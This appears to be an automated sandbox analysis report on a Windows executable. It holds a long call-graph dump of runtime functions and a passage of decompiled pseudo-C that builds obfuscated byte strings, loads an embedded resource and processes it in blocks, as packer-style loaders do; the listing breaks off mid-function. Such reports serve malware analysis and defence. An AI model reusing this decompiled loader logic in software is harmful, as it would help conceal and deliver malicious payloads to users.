__crtGetStringTypeA_stat 63 API calls 14666->14667 14668 4177ca 14667->14668 14669 40b6b5 __crtGetStringTypeA_stat 63 API calls 14668->14669 14670 4177d5 14669->14670 14671 40b6b5 __crtGetStringTypeA_stat 63 API calls 14670->14671 14672 4177e0 14671->14672 14673 40b6b5 __crtGetStringTypeA_stat 63 API calls 14672->14673 14674 4177eb 14673->14674 14675 40b6b5 __crtGetStringTypeA_stat 63 API calls 14674->14675 14675->14676 14676->14549 14677->14520 14681 40d606 LeaveCriticalSection 14678->14681 14680 41406e 14680->14499 
14681->14680 14683 4142dd ___lock_fhandle 14682->14683 14684 410735 __getptd 63 API calls 14683->14684 14685 4142e6 14684->14685 14686 413fcc __setmbcp 65 API calls 14685->14686 14687 4142f0 14686->14687 14713 414070 14687->14713 14690 411c75 __malloc_crt 63 API calls 14692 414311 14690->14692 14691 414430 ___lock_fhandle 14691->14458 14692->14691 14720 4140ec 14692->14720 14695 414341 InterlockedDecrement 14697 414351 14695->14697 14698 414362 InterlockedIncrement 14695->14698 14696 41443d 14696->14691 14699 414450 14696->14699 14701 40b6b5 __crtGetStringTypeA_stat 63 API calls 14696->14701 14697->14698 14703 40b6b5 __crtGetStringTypeA_stat 63 API calls 14697->14703 14698->14691 14700 414378 14698->14700 14702 40bfc1 ___strgtold12_l 63 API calls 14699->14702 14700->14691 14705 40d6e0 __lock 63 API calls 14700->14705 14701->14699 14702->14691 14704 414361 14703->14704 14704->14698 14707 41438c InterlockedDecrement 14705->14707 14708 414408 14707->14708 14709 41441b InterlockedIncrement 14707->14709 14708->14709 14711 40b6b5 __crtGetStringTypeA_stat 63 API calls 14708->14711 14730 414432 14709->14730 14712 41441a 14711->14712 14712->14709 14714 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 14713->14714 14715 414084 14714->14715 14716 4140ad 14715->14716 14717 41408f GetOEMCP 14715->14717 14718 4140b2 GetACP 14716->14718 14719 41409f 14716->14719 14717->14719 14718->14719 14719->14690 14719->14691 14721 414070 getSystemCP 75 API calls 14720->14721 14722 41410c 14721->14722 14723 414117 setSBCS 14722->14723 14726 41415b IsValidCodePage 14722->14726 14729 414180 _memset __setmbcp_nolock 14722->14729 14724 40ce09 ___strgtold12_l 5 API calls 14723->14724 14725 4142cf 14724->14725 14725->14695 14725->14696 14726->14723 14727 41416d GetCPInfo 14726->14727 14727->14723 14727->14729 14733 413e39 GetCPInfo 14729->14733 14866 40d606 LeaveCriticalSection 14730->14866 14732 414439 14732->14691 14734 413f1f 14733->14734 14735 413e6d _memset 14733->14735 14739 40ce09 
___strgtold12_l 5 API calls 14734->14739 14743 417625 14735->14743 14741 413fca 14739->14741 14741->14729 14742 417426 ___crtLCMapStringA 98 API calls 14742->14734 14744 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 14743->14744 14745 417638 14744->14745 14753 41746b 14745->14753 14748 417426 14749 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 14748->14749 14750 417439 14749->14750 14819 417081 14750->14819 14754 4174b7 14753->14754 14755 41748c GetStringTypeW 14753->14755 14756 41759e 14754->14756 14757 4174a4 14754->14757 14755->14757 14758 4174ac GetLastError 14755->14758 14781 417a20 GetLocaleInfoA 14756->14781 14759 4174f0 MultiByteToWideChar 14757->14759 14769 417598 14757->14769 14758->14754 14763 41751d 14759->14763 14759->14769 14761 40ce09 ___strgtold12_l 5 API calls 14762 413eda 14761->14762 14762->14748 14766 40b84d _malloc 63 API calls 14763->14766 14776 417532 _memset __crtGetStringTypeA_stat 14763->14776 14765 4175ef GetStringTypeA 14765->14769 14770 41760a 14765->14770 14766->14776 14768 41756b MultiByteToWideChar 14772 417581 GetStringTypeW 14768->14772 14773 417592 14768->14773 14769->14761 14774 40b6b5 __crtGetStringTypeA_stat 63 API calls 14770->14774 14772->14773 14777 4147ae 14773->14777 14774->14769 14776->14768 14776->14769 14778 4147cb 14777->14778 14779 4147ba 14777->14779 14778->14769 14779->14778 14780 40b6b5 __crtGetStringTypeA_stat 63 API calls 14779->14780 14780->14778 14782 417a53 14781->14782 14783 417a4e 14781->14783 14812 416f54 14782->14812 14785 40ce09 ___strgtold12_l 5 API calls 14783->14785 14786 4175c2 14785->14786 14786->14765 14786->14769 14787 417a69 14786->14787 14788 417aa9 GetCPInfo 14787->14788 14789 417b33 14787->14789 14790 417ac0 14788->14790 14791 417b1e MultiByteToWideChar 14788->14791 14792 40ce09 ___strgtold12_l 5 API calls 14789->14792 14790->14791 14793 417ac6 GetCPInfo 14790->14793 14791->14789 14796 417ad9 _strlen 14791->14796 14794 4175e3 14792->14794 14793->14791 14795 417ad3 14793->14795 
14794->14765 14794->14769 14795->14791 14795->14796 14797 40b84d _malloc 63 API calls 14796->14797 14801 417b0b _memset __crtGetStringTypeA_stat 14796->14801 14797->14801 14798 417b68 MultiByteToWideChar 14799 417b80 14798->14799 14800 417b9f 14798->14800 14803 417ba4 14799->14803 14804 417b87 WideCharToMultiByte 14799->14804 14802 4147ae __freea 63 API calls 14800->14802 14801->14789 14801->14798 14802->14789 14805 417bc3 14803->14805 14806 417baf WideCharToMultiByte 14803->14806 14804->14800 14807 411cba __calloc_crt 63 API calls 14805->14807 14806->14800 14806->14805 14808 417bcb 14807->14808 14808->14800 14809 417bd4 WideCharToMultiByte 14808->14809 14809->14800 14810 417be6 14809->14810 14811 40b6b5 __crtGetStringTypeA_stat 63 API calls 14810->14811 14811->14800 14815 41a354 14812->14815 14816 41a36d 14815->14816 14817 41a125 strtoxl 87 API calls 14816->14817 14818 416f65 14817->14818 14818->14783 14820 4170a2 LCMapStringW 14819->14820 14823 4170bd 14819->14823 14821 4170c5 GetLastError 14820->14821 14820->14823 14821->14823 14822 4172bb 14826 417a20 ___ansicp 87 API calls 14822->14826 14823->14822 14824 417117 14823->14824 14825 417130 MultiByteToWideChar 14824->14825 14840 4172b2 14824->14840 14834 41715d 14825->14834 14825->14840 14827 4172e3 14826->14827 14830 4173d7 LCMapStringA 14827->14830 14831 4172fc 14827->14831 14827->14840 14828 40ce09 ___strgtold12_l 5 API calls 14829 413efa 14828->14829 14829->14742 14846 417333 14830->14846 14832 417a69 ___convertcp 70 API calls 14831->14832 14836 41730e 14832->14836 14833 4171ae MultiByteToWideChar 14837 4171c7 LCMapStringW 14833->14837 14838 4172a9 14833->14838 14835 40b84d _malloc 63 API calls 14834->14835 14845 417176 __crtGetStringTypeA_stat 14834->14845 14835->14845 14836->14840 14842 417318 LCMapStringA 14836->14842 14837->14838 14844 4171e8 14837->14844 14843 4147ae __freea 63 API calls 14838->14843 14839 40b6b5 __crtGetStringTypeA_stat 63 API calls 14841 4173fe 14839->14841 14840->14828 14841->14840 
14848 40b6b5 __crtGetStringTypeA_stat 63 API calls 14841->14848 14842->14846 14851 41733a 14842->14851 14843->14840 14847 4171f1 14844->14847 14850 41721a 14844->14850 14845->14833 14845->14840 14846->14839 14846->14841 14847->14838 14849 417203 LCMapStringW 14847->14849 14848->14840 14849->14838 14856 417235 __crtGetStringTypeA_stat 14850->14856 14858 40b84d _malloc 63 API calls 14850->14858 14853 40b84d _malloc 63 API calls 14851->14853 14857 41734b _memset __crtGetStringTypeA_stat 14851->14857 14852 417269 LCMapStringW 14854 417281 WideCharToMultiByte 14852->14854 14855 4172a3 14852->14855 14853->14857 14854->14855 14859 4147ae __freea 63 API calls 14855->14859 14856->14838 14856->14852 14857->14846 14860 417389 LCMapStringA 14857->14860 14858->14856 14859->14838 14862 4173a5 14860->14862 14863 4173a9 14860->14863 14865 4147ae __freea 63 API calls 14862->14865 14864 417a69 ___convertcp 70 API calls 14863->14864 14864->14862 14865->14846 14866->14732 14868 41358c 14867->14868 14869 41046e __encode_pointer 6 API calls 14868->14869 14870 4135a4 14868->14870 14869->14868 14870->14005 14874 40d281 14871->14874 14873 40d2ca 14873->14007 14875 40d28d ___lock_fhandle 14874->14875 14882 40e806 14875->14882 14881 40d2ae ___lock_fhandle 14881->14873 14883 40d6e0 __lock 63 API calls 14882->14883 14884 40d292 14883->14884 14885 40d196 14884->14885 14886 4104e9 __decode_pointer 6 API calls 14885->14886 14887 40d1aa 14886->14887 14888 4104e9 __decode_pointer 6 API calls 14887->14888 14889 40d1ba 14888->14889 14897 40d23d 14889->14897 14905 40e56a 14889->14905 14891 40d1d8 14896 40d1fc 14891->14896 14901 40d224 14891->14901 14918 411d06 14891->14918 14892 41046e __encode_pointer 6 API calls 14893 40d232 14892->14893 14894 41046e __encode_pointer 6 API calls 14893->14894 14894->14897 14896->14897 14898 411d06 __realloc_crt 73 API calls 14896->14898 14899 40d212 14896->14899 14902 40d2b7 14897->14902 14898->14899 14899->14897 14900 41046e __encode_pointer 6 API calls 14899->14900 
14900->14901 14901->14892 14967 40e80f 14902->14967 14906 40e576 ___lock_fhandle 14905->14906 14907 40e5a3 14906->14907 14908 40e586 14906->14908 14910 40e5e4 HeapSize 14907->14910 14912 40d6e0 __lock 63 API calls 14907->14912 14909 40bfc1 ___strgtold12_l 63 API calls 14908->14909 14911 40e58b 14909->14911 14914 40e59b ___lock_fhandle 14910->14914 14913 40e744 ___strgtold12_l 6 API calls 14911->14913 14915 40e5b3 ___sbh_find_block 14912->14915 14913->14914 14914->14891 14923 40e604 14915->14923 14920 411d0f 14918->14920 14921 411d4e 14920->14921 14922 411d2f Sleep 14920->14922 14927 40e34f 14920->14927 14921->14896 14922->14920 14926 40d606 LeaveCriticalSection 14923->14926 14925 40e5df 14925->14910 14925->14914 14926->14925 14928 40e35b ___lock_fhandle 14927->14928 14929 40e370 14928->14929 14930 40e362 14928->14930 14932 40e383 14929->14932 14933 40e377 14929->14933 14931 40b84d _malloc 63 API calls 14930->14931 14948 40e36a ___lock_fhandle __dosmaperr 14931->14948 14940 40e4f5 14932->14940 14960 40e390 _realloc ___sbh_resize_block ___sbh_find_block 14932->14960 14934 40b6b5 __crtGetStringTypeA_stat 63 API calls 14933->14934 14934->14948 14935 40e528 14936 40d2e3 _malloc 6 API calls 14935->14936 14939 40e52e 14936->14939 14937 40d6e0 __lock 63 API calls 14937->14960 14938 40e4fa HeapReAlloc 14938->14940 14938->14948 14941 40bfc1 ___strgtold12_l 63 API calls 14939->14941 14940->14935 14940->14938 14942 40e54c 14940->14942 14943 40d2e3 _malloc 6 API calls 14940->14943 14946 40e542 14940->14946 14941->14948 14944 40bfc1 ___strgtold12_l 63 API calls 14942->14944 14942->14948 14943->14940 14947 40e555 GetLastError 14944->14947 14949 40bfc1 ___strgtold12_l 63 API calls 14946->14949 14947->14948 14948->14920 14951 40e4c3 14949->14951 14950 40e41b HeapAlloc 14950->14960 14951->14948 14953 40e4c8 GetLastError 14951->14953 14952 40e470 HeapReAlloc 14952->14960 14953->14948 14954 40def2 ___sbh_alloc_block 5 API calls 14954->14960 14955 40e4db 14955->14948 14957 40bfc1 
___strgtold12_l 63 API calls 14955->14957 14956 40d2e3 _malloc 6 API calls 14956->14960 14958 40e4e8 14957->14958 14958->14947 14958->14948 14959 40e4be 14961 40bfc1 ___strgtold12_l 63 API calls 14959->14961 14960->14935 14960->14937 14960->14948 14960->14950 14960->14952 14960->14954 14960->14955 14960->14956 14960->14959 14962 40d743 __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 14960->14962 14963 40e493 14960->14963 14961->14951 14962->14960 14966 40d606 LeaveCriticalSection 14963->14966 14965 40e49a 14965->14960 14966->14965 14970 40d606 LeaveCriticalSection 14967->14970 14969 40d2bc 14969->14881 14970->14969 14974 40b9aa ___lock_fhandle _strnlen 14971->14974 14972 40b9b8 14973 40bfc1 ___strgtold12_l 63 API calls 14972->14973 14975 40b9bd 14973->14975 14974->14972 14977 40b9ec 14974->14977 14976 40e744 ___strgtold12_l 6 API calls 14975->14976 14983 40b9cd ___lock_fhandle 14976->14983 14978 40d6e0 __lock 63 API calls 14977->14978 14979 40b9f3 14978->14979 15028 40b917 14979->15028 14983->14011 14985 4017cc _realloc 14984->14985 14985->14016 14988 40af70 14986->14988 14987 40b84d _malloc 63 API calls 14987->14988 14988->14987 14989 40af8a 14988->14989 14990 40d2e3 _malloc 6 API calls 14988->14990 14993 40af8c std::bad_alloc::bad_alloc 14988->14993 14989->14021 14990->14988 14991 40afb2 15242 40af49 14991->15242 14993->14991 14995 40d2bd __cinit 74 API calls 14993->14995 14995->14991 14997 40afca 14999 401903 lstrlenA 14998->14999 15000 4018fc 14998->15000 15254 4017e0 14999->15254 15000->14043 15003 401940 GetLastError 15005 40194b MultiByteToWideChar 15003->15005 15006 40198d 15003->15006 15004 401996 15004->14043 15007 4017e0 73 API calls 15005->15007 15006->15004 15262 401030 GetLastError 15006->15262 15009 401970 MultiByteToWideChar 15007->15009 15009->15006 15011 40af66 75 API calls 15010->15011 15012 40187c 15011->15012 15013 401885 SysAllocString 15012->15013 15014 4018a4 15012->15014 15013->15014 15014->14045 15016 40231a 

                                                                        Control-flow Graph

                                                                        [Figure: control-flow graph of the function at 4019f0; legend: Executed, Not Executed]
                                                                        C-Code - Quality: 77%
                                                                        			E004019F0(void* __edx, void* __eflags) {
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				void* _t337;
                                                                        				void* _t340;
                                                                        				int _t341;
                                                                        				CHAR* _t344;
                                                                        				intOrPtr* _t349;
                                                                        				int _t350;
                                                                        				long _t352;
                                                                        				signed int _t354;
                                                                        				intOrPtr _t358;
                                                                        				long _t359;
                                                                        				CHAR* _t364;
                                                                        				struct HINSTANCE__* _t365;
                                                                        				CHAR* _t366;
                                                                        				_Unknown_base(*)()* _t367;
                                                                        				int _t368;
                                                                        				int _t369;
                                                                        				int _t370;
                                                                        				intOrPtr* _t376;
                                                                        				int _t378;
                                                                        				intOrPtr _t379;
                                                                        				intOrPtr* _t381;
                                                                        				int _t383;
                                                                        				intOrPtr* _t384;
                                                                        				int _t385;
                                                                        				int _t396;
                                                                        				int _t399;
                                                                        				int _t402;
                                                                        				int _t405;
                                                                        				intOrPtr* _t407;
                                                                        				int _t413;
                                                                        				int _t415;
                                                                        				void* _t421;
                                                                        				int _t422;
                                                                        				int _t424;
                                                                        				intOrPtr* _t428;
                                                                        				intOrPtr _t429;
                                                                        				intOrPtr* _t431;
                                                                        				int _t432;
                                                                        				int _t435;
                                                                        				intOrPtr* _t437;
                                                                        				int _t438;
                                                                        				intOrPtr* _t439;
                                                                        				int _t440;
                                                                        				int _t442;
                                                                        				signed int _t448;
                                                                        				signed int _t451;
                                                                        				signed int _t452;
                                                                        				int _t469;
                                                                        				int _t471;
                                                                        				int _t482;
                                                                        				signed int _t486;
                                                                        				intOrPtr* _t488;
                                                                        				intOrPtr* _t490;
                                                                        				intOrPtr* _t492;
                                                                        				intOrPtr _t493;
                                                                        				void* _t494;
                                                                        				struct HRSRC__* _t497;
                                                                        				void* _t514;
                                                                        				int _t519;
                                                                        				intOrPtr* _t520;
                                                                        				void* _t524;
                                                                        				void* _t525;
                                                                        				struct HINSTANCE__* _t526;
                                                                        				intOrPtr _t527;
                                                                        				void* _t531;
                                                                        				void* _t535;
                                                                        				struct HRSRC__* _t536;
                                                                        				intOrPtr* _t537;
                                                                        				intOrPtr* _t539;
                                                                        				int _t542;
                                                                        				int _t543;
                                                                        				intOrPtr* _t547;
                                                                        				intOrPtr* _t548;
                                                                        				intOrPtr* _t549;
                                                                        				intOrPtr* _t550;
                                                                        				void* _t551;
                                                                        				intOrPtr _t552;
                                                                        				int _t555;
                                                                        				void* _t556;
                                                                        				void* _t557;
                                                                        				void* _t558;
                                                                        				void* _t559;
                                                                        				void* _t560;
                                                                        				void* _t561;
                                                                        				void* _t562;
                                                                        				intOrPtr* _t563;
                                                                        				void* _t564;
                                                                        				void* _t565;
                                                                        				void* _t566;
                                                                        				void* _t567;
                                                                        
                                                                        				_t567 = __eflags;
                                                                        				_t494 = __edx;
                                                                        				__imp__OleInitialize(0); // executed
                                                                        				 *((char*)(_t556 + 0x18)) = 0xe0;
                                                                        				 *((char*)(_t556 + 0x19)) = 0x3b;
                                                                        				 *((char*)(_t556 + 0x1a)) = 0x8d;
                                                                        				 *((char*)(_t556 + 0x1b)) = 0x2a;
                                                                        				 *((char*)(_t556 + 0x1c)) = 0xa2;
                                                                        				 *((char*)(_t556 + 0x1d)) = 0x2a;
                                                                        				 *((char*)(_t556 + 0x1e)) = 0x2a;
                                                                        				 *((char*)(_t556 + 0x1f)) = 0x41;
                                                                        				 *((char*)(_t556 + 0x20)) = 0xd3;
                                                                        				 *((char*)(_t556 + 0x21)) = 0x20;
                                                                        				 *((char*)(_t556 + 0x22)) = 0x64;
                                                                        				 *((char*)(_t556 + 0x23)) = 6;
                                                                        				 *((char*)(_t556 + 0x24)) = 0x8a;
                                                                        				 *((char*)(_t556 + 0x25)) = 0xf7;
                                                                        				 *((char*)(_t556 + 0x26)) = 0x3d;
                                                                        				 *((char*)(_t556 + 0x27)) = 0x9d;
                                                                        				 *((char*)(_t556 + 0x28)) = 0xd9;
                                                                        				 *((char*)(_t556 + 0x29)) = 0xee;
                                                                        				 *((char*)(_t556 + 0x2a)) = 0x15;
                                                                        				 *((char*)(_t556 + 0x2b)) = 0x68;
                                                                        				 *((char*)(_t556 + 0x2c)) = 0xf4;
                                                                        				 *((char*)(_t556 + 0x2d)) = 0x76;
                                                                        				 *((char*)(_t556 + 0x2e)) = 0xb9;
                                                                        				 *((char*)(_t556 + 0x2f)) = 0x34;
                                                                        				 *((char*)(_t556 + 0x30)) = 0xbf;
                                                                        				 *((char*)(_t556 + 0x31)) = 0x1e;
                                                                        				 *((char*)(_t556 + 0x32)) = 0xe7;
                                                                        				 *((char*)(_t556 + 0x33)) = 0x78;
                                                                        				 *((char*)(_t556 + 0x34)) = 0x98;
                                                                        				 *((char*)(_t556 + 0x35)) = 0xe9;
                                                                        				 *((char*)(_t556 + 0x36)) = 0x6f;
                                                                        				 *((char*)(_t556 + 0x37)) = 0xb4;
                                                                        				 *((char*)(_t556 + 0x38)) = 0;
                                                                        				_push(E00401650(_t556 + 0x14, _t556 + 0x114));
                                                                        				_t337 = E0040B99E(0, _t494, _t524, _t535, _t567);
                                                                        				_t557 = _t556 + 0xc;
                                                                        				if(_t337 == 0x41b2a0) {
                                                                        					L80:
                                                                        					__eflags = 0;
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t340 = CreateToolhelp32Snapshot(8, GetCurrentProcessId()); // executed
                                                                        					_t525 = _t340;
                                                                        					 *((intOrPtr*)(_t557 + 0x280)) = 0x224;
                                                                        					 *((char*)(_t557 + 0x64)) = 0xce;
                                                                        					 *((char*)(_t557 + 0x65)) = 0x27;
                                                                        					 *((char*)(_t557 + 0x66)) = 0x9c;
                                                                        					 *((char*)(_t557 + 0x67)) = 0x1a;
                                                                        					 *((char*)(_t557 + 0x68)) = 0x95;
                                                                        					 *((char*)(_t557 + 0x69)) = 0x2e;
                                                                        					 *((char*)(_t557 + 0x6a)) = 0x22;
                                                                        					 *((char*)(_t557 + 0x6b)) = 0x57;
                                                                        					 *((char*)(_t557 + 0x6c)) = 0x91;
                                                                        					 *((char*)(_t557 + 0x6d)) = 0x21;
                                                                        					 *((char*)(_t557 + 0x6e)) = 0x57;
                                                                        					 *((char*)(_t557 + 0x6f)) = 0x3a;
                                                                        					 *((char*)(_t557 + 0x70)) = 0xf8;
                                                                        					 *((char*)(_t557 + 0x71)) = 0x98;
                                                                        					 *((char*)(_t557 + 0x72)) = 0x5b;
                                                                        					 *((char*)(_t557 + 0x73)) = 0xf4;
                                                                        					 *((char*)(_t557 + 0x74)) = 0xb5;
                                                                        					 *((char*)(_t557 + 0x75)) = 0x87;
                                                                        					 *((char*)(_t557 + 0x76)) = 0x7b;
                                                                        					 *((char*)(_t557 + 0x77)) = 0xf;
                                                                        					 *((char*)(_t557 + 0x78)) = 0xf4;
                                                                        					 *((char*)(_t557 + 0x79)) = 0x76;
                                                                        					 *((char*)(_t557 + 0x7a)) = 0xb9;
                                                                        					 *((char*)(_t557 + 0x7b)) = 0x34;
                                                                        					 *((char*)(_t557 + 0x7c)) = 0xbf;
                                                                        					 *((char*)(_t557 + 0x7d)) = 0x1e;
                                                                        					 *((char*)(_t557 + 0x7e)) = 0xe7;
                                                                        					 *((char*)(_t557 + 0x7f)) = 0x78;
                                                                        					 *((char*)(_t557 + 0x80)) = 0x98;
                                                                        					 *((char*)(_t557 + 0x81)) = 0xe9;
                                                                        					 *((char*)(_t557 + 0x82)) = 0x6f;
                                                                        					 *((char*)(_t557 + 0x83)) = 0xb4;
                                                                        					 *((char*)(_t557 + 0x84)) = 0;
                                                                        					 *((char*)(_t557 + 0x18)) = 0xc0;
                                                                        					 *((char*)(_t557 + 0x19)) = 0x38;
                                                                        					 *((char*)(_t557 + 0x1a)) = 0x8d;
                                                                        					 *((char*)(_t557 + 0x1b)) = 0x1f;
                                                                        					 *((char*)(_t557 + 0x1c)) = 0x8e;
                                                                        					 *((char*)(_t557 + 0x1d)) = 0x30;
                                                                        					 *((char*)(_t557 + 0x1e)) = 0x65;
                                                                        					 *((char*)(_t557 + 0x1f)) = 0x47;
                                                                        					 *((char*)(_t557 + 0x20)) = 0xd3;
                                                                        					 *((char*)(_t557 + 0x21)) = 0x29;
                                                                        					 *((char*)(_t557 + 0x22)) = 0x3b;
                                                                        					 *((char*)(_t557 + 0x23)) = 0x56;
                                                                        					 *((char*)(_t557 + 0x24)) = 0xf8;
                                                                        					 *((char*)(_t557 + 0x25)) = 0x98;
                                                                        					 *((char*)(_t557 + 0x26)) = 0x5b;
                                                                        					 *((char*)(_t557 + 0x27)) = 0xf4;
                                                                        					 *((char*)(_t557 + 0x28)) = 0xb5;
                                                                        					 *((char*)(_t557 + 0x29)) = 0x87;
                                                                        					 *((char*)(_t557 + 0x2a)) = 0x7b;
                                                                        					 *((char*)(_t557 + 0x2b)) = 0xf;
                                                                        					 *((char*)(_t557 + 0x2c)) = 0xf4;
                                                                        					 *((char*)(_t557 + 0x2d)) = 0x76;
                                                                        					 *((char*)(_t557 + 0x2e)) = 0xb9;
                                                                        					 *((char*)(_t557 + 0x2f)) = 0x34;
                                                                        					 *((char*)(_t557 + 0x30)) = 0xbf;
                                                                        					 *((char*)(_t557 + 0x31)) = 0x1e;
                                                                        					 *((char*)(_t557 + 0x32)) = 0xe7;
                                                                        					 *((char*)(_t557 + 0x33)) = 0x78;
                                                                        					 *((char*)(_t557 + 0x34)) = 0x98;
                                                                        					 *((char*)(_t557 + 0x35)) = 0xe9;
                                                                        					 *((char*)(_t557 + 0x36)) = 0x6f;
                                                                        					 *((char*)(_t557 + 0x37)) = 0xb4;
                                                                        					 *((char*)(_t557 + 0x38)) = 0;
                                                                        					_t341 = Module32First(_t525, _t557 + 0x278); // executed
                                                                        					if(_t341 == 0) {
                                                                        						L38:
                                                                        						CloseHandle(_t525);
                                                                        						_t526 = GetModuleHandleA(0);
                                                                        						 *((char*)(_t557 + 0x1c)) = 0xfc;
                                                                        						 *((char*)(_t557 + 0x1d)) = 0xb;
                                                                        						 *((char*)(_t557 + 0x1e)) = 0xff;
                                                                        						 *((char*)(_t557 + 0x1f)) = 0x75;
                                                                        						 *((char*)(_t557 + 0x20)) = 0xe7;
                                                                        						 *((char*)(_t557 + 0x21)) = 0x44;
                                                                        						 *((char*)(_t557 + 0x22)) = 0x4b;
                                                                        						 *((char*)(_t557 + 0x23)) = 0x23;
                                                                        						 *((char*)(_t557 + 0x24)) = 0xbf;
                                                                        						 *((char*)(_t557 + 0x25)) = 0x45;
                                                                        						 *((char*)(_t557 + 0x26)) = 0x3b;
                                                                        						 *((char*)(_t557 + 0x27)) = 0x56;
                                                                        						 *((char*)(_t557 + 0x28)) = 0xf8;
                                                                        						 *((char*)(_t557 + 0x29)) = 0x98;
                                                                        						 *((char*)(_t557 + 0x2a)) = 0x5b;
                                                                        						 *((char*)(_t557 + 0x2b)) = 0xf4;
                                                                        						 *((char*)(_t557 + 0x2c)) = 0xb5;
                                                                        						 *((char*)(_t557 + 0x2d)) = 0x87;
                                                                        						 *((char*)(_t557 + 0x2e)) = 0x7b;
                                                                        						 *((char*)(_t557 + 0x2f)) = 0xf;
                                                                        						 *((char*)(_t557 + 0x30)) = 0xf4;
                                                                        						 *((char*)(_t557 + 0x31)) = 0x76;
                                                                        						 *((char*)(_t557 + 0x32)) = 0xb9;
                                                                        						 *((char*)(_t557 + 0x33)) = 0x34;
                                                                        						 *((char*)(_t557 + 0x34)) = 0xbf;
                                                                        						 *((char*)(_t557 + 0x35)) = 0x1e;
                                                                        						 *((char*)(_t557 + 0x36)) = 0xe7;
                                                                        						 *((char*)(_t557 + 0x37)) = 0x78;
                                                                        						 *((char*)(_t557 + 0x38)) = 0x98;
                                                                        						 *((char*)(_t557 + 0x39)) = 0xe9;
                                                                        						 *((char*)(_t557 + 0x3a)) = 0x6f;
                                                                        						 *((char*)(_t557 + 0x3b)) = 0xb4;
                                                                        						 *((char*)(_t557 + 0x3c)) = 0;
                                                                        						_t344 = E00401650(_t557 + 0x18, _t557 + 0x158);
                                                                        						_t558 = _t557 + 8;
                                                                        						_t536 = FindResourceA(_t526, _t344, 0xa);
                                                                        						 *(_t558 + 0x50) = _t536;
                                                                        						_t551 = LoadResource(_t526, _t536);
                                                                        						 *((intOrPtr*)(_t558 + 0x44)) = LockResource(_t551);
                                                                        						_t349 = E0040B84D(0, _t557 + 0x18, _t526, SizeofResource(_t526, _t536)); // executed
                                                                        						_push(0x40022);
                                                                        						_t537 = _t349; // executed
                                                                        						_t350 = E0040AF66(0, _t526, __eflags); // executed
                                                                        						_t559 = _t558 + 8;
                                                                        						 *(_t559 + 0x34) = _t350;
                                                                        						__eflags = _t350;
                                                                        						if(_t350 == 0) {
                                                                        							 *(_t559 + 0x50) = 0;
                                                                        						} else {
                                                                        							E0040BA30(_t526, _t350, 0, 0x40022);
                                                                        							_t486 =  *(_t559 + 0x40);
                                                                        							_t559 = _t559 + 0xc;
                                                                        							 *(_t559 + 0x50) = _t486;
                                                                        						}
                                                                        						E00401300( *(_t559 + 0x50));
                                                                        						_t497 =  *(_t559 + 0x48);
                                                                        						_t352 = SizeofResource(_t526, _t497);
                                                                        						 *(_t559 + 0x40) = _t352;
                                                                        						asm("cdq");
                                                                        						_t354 = _t352 + (_t497 & 0x000003ff) >> 0xa;
                                                                        						__eflags = _t354;
                                                                        						if(_t354 > 0) {
                                                                        							_t519 =  *(_t559 + 0x3c);
                                                                        							_t482 = _t537 - _t519;
                                                                        							__eflags = _t482;
                                                                        							 *(_t559 + 0x34) = _t519;
                                                                        							 *(_t559 + 0x88) = _t482;
                                                                        							 *(_t559 + 0x38) = _t354;
                                                                        							do {
                                                                        								_t424 =  *(_t559 + 0x34);
                                                                        								_push( *(_t559 + 0x88) + _t424);
                                                                        								_push(0x400);
                                                                        								_push(_t424);
                                                                        								E00401560(0,  *((intOrPtr*)(_t559 + 0x54)));
                                                                        								 *(_t559 + 0x34) =  *(_t559 + 0x34) + 0x400;
                                                                        								_t179 = _t559 + 0x38;
                                                                        								 *_t179 =  *(_t559 + 0x38) - 1;
                                                                        								__eflags =  *_t179;
                                                                        							} while ( *_t179 != 0);
                                                                        						}
                                                                        						_t448 =  *(_t559 + 0x40) & 0x800003ff;
                                                                        						__eflags = _t448;
                                                                        						if(_t448 < 0) {
                                                                        							_t448 = (_t448 - 0x00000001 | 0xfffffc00) + 1;
                                                                        							__eflags = _t448;
                                                                        						}
                                                                        						__eflags = _t448;
                                                                        						if(_t448 > 0) {
                                                                        							_t421 =  *(_t559 + 0x40) - _t448;
                                                                        							_push(_t421 + _t537);
                                                                        							_push(_t448);
                                                                        							_t422 = _t421 +  *((intOrPtr*)(_t559 + 0x44));
                                                                        							__eflags = _t422;
                                                                        							_push(_t422);
                                                                        							E00401560(0,  *((intOrPtr*)(_t559 + 0x58)));
                                                                        						}
                                                                        						E0040BA30(_t526,  *(_t559 + 0x3c), 0,  *(_t559 + 0x40));
                                                                        						_t560 = _t559 + 0xc;
                                                                        						FreeResource(_t551);
                                                                        						_t552 =  *_t537;
                                                                        						 *((intOrPtr*)(_t560 + 0x94)) = _t552;
                                                                        						_t358 = E0040B84D(0,  *(_t559 + 0x40), _t526, _t552); // executed
                                                                        						_t561 = _t560 + 4;
                                                                        						 *((intOrPtr*)(_t561 + 0x40)) = _t358;
                                                                        						_t359 = SizeofResource(_t526,  *(_t560 + 0x4c));
                                                                        						_t527 =  *((intOrPtr*)(_t561 + 0x38));
                                                                        						_t192 = _t537 + 4; // 0x4
                                                                        						E0040AC60(_t527, _t561 + 0x98, _t192, _t359);
                                                                        						E0040BA30(_t527, _t537, 0,  *((intOrPtr*)(_t561 + 0x50)));
                                                                        						_t528 = _t527 + 0xe;
                                                                        						 *((char*)(_t561 + 0x34)) = 0xce;
                                                                        						 *((char*)(_t561 + 0x35)) = 0x27;
                                                                        						 *((char*)(_t561 + 0x36)) = 0x9c;
                                                                        						 *((char*)(_t561 + 0x37)) = 0x1a;
                                                                        						 *((char*)(_t561 + 0x38)) = 0x95;
                                                                        						 *((char*)(_t561 + 0x39)) = 0x21;
                                                                        						 *((char*)(_t561 + 0x3a)) = 0x2e;
                                                                        						 *((char*)(_t561 + 0x3b)) = 0xd;
                                                                        						 *((char*)(_t561 + 0x3c)) = 0xdb;
                                                                        						 *((char*)(_t561 + 0x3d)) = 0x29;
                                                                        						 *((char*)(_t561 + 0x3e)) = 0x57;
                                                                        						 *((char*)(_t561 + 0x3f)) = 0x56;
                                                                        						 *((char*)(_t561 + 0x40)) = 0xf8;
                                                                        						 *((char*)(_t561 + 0x41)) = 0x98;
                                                                        						 *((char*)(_t561 + 0x42)) = 0x5b;
